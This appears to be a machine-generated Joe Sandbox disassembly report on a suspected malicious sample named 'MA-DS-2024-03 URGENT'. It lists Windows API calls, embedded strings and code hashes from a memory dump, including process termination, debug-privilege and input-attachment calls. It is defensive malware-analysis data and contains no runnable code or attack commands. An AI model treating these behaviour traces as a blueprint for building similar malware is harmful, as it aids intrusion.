                                                        • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                        • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                                        • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                        • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                                        • GetDlgCtrlID.USER32 ref: 00459108
                                                        • GetParent.USER32 ref: 00459124
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                                        • GetDlgCtrlID.USER32(?), ref: 00459130
                                                        • GetParent.USER32(?), ref: 0045914C
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                        • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                                        • Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                        • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                                        APIs
                                                        • GetParent.USER32 ref: 0045916F
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                                        • _wcscmp.LIBCMT ref: 00459196
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-3381328864
                                                        • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                        • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                                        • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                        • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 004611F0
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                        • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                                                        • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                        • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$_memset
                                                        • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2862541840-2080382077
                                                        • Opcode ID: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                                                        • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                                        • Opcode Fuzzy Hash: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                                                        • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                                        APIs
                                                        • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                                                        • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                                        • Opcode Fuzzy Hash: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                                                        • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                          • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                          • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                          • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                        • GetDC.USER32 ref: 0043CD32
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                                        • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                                        • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                                        • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                        • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                                        • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                        • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                                        APIs
                                                        • RtlDecodePointer.NTDLL(00000000), ref: 016B1A3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: DecodePointer
                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                        • API String ID: 3527080286-3064271455
                                                        • Opcode ID: 7b2a2f5bb8d00dd1b14a9a25e84c0d28d3d3a56e71c749378015550cbd4e50f5
                                                        • Instruction ID: 8e3d9cf3aae51736835926f5aee28f0f430e47896dc15a9bb7a8d39f49f1ac91
                                                        • Opcode Fuzzy Hash: 7b2a2f5bb8d00dd1b14a9a25e84c0d28d3d3a56e71c749378015550cbd4e50f5
                                                        • Instruction Fuzzy Hash: 3C51AA7190050AEBDF149FA8FDA81EDBFB0FF4A300F144199D981A7318CB358AA8CB54
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
• SysFreeString.OLEAUT32(?), ref: 00478F00
Memory Dump Source
• Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
• Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
• Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
• Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
APIs
  • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
  • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
  • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
• lstrcmpiW.KERNEL32(?,?), ref: 00464D40
• _wcscmp.LIBCMT ref: 00464D5A
• MoveFileW.KERNEL32(?,?), ref: 00464D75
Memory Dump Source
• Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
• Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
• Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
• Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
• Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
Memory Dump Source
• Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
• Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
• Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
• Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
• DestroyIcon.USER32(00000000), ref: 0043C37F
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
• DestroyIcon.USER32(?), ref: 0043C3AB
  • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
Memory Dump Source
• Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
• String ID:
• API String ID: 2819616528-0
• Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
• Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
• Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
• Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
• HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
• GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
• DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
• GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
• DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
• CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
Memory Dump Source
• Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
• Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
• Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
• Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
• SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
• _wcscat.LIBCMT ref: 00486EAD
• SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
Similarity
• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
• Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
• Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
• Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
• Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
APIs
  • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
  • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
  • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
• GetLastError.KERNEL32 ref: 0047E9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
• GetLastError.KERNEL32(00000000), ref: 0047EA6E
• CloseHandle.KERNEL32(00000000), ref: 0047EAA3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
• Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
• Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
• Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00463033
Strings
Memory Dump Source
• Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
• Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
• Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
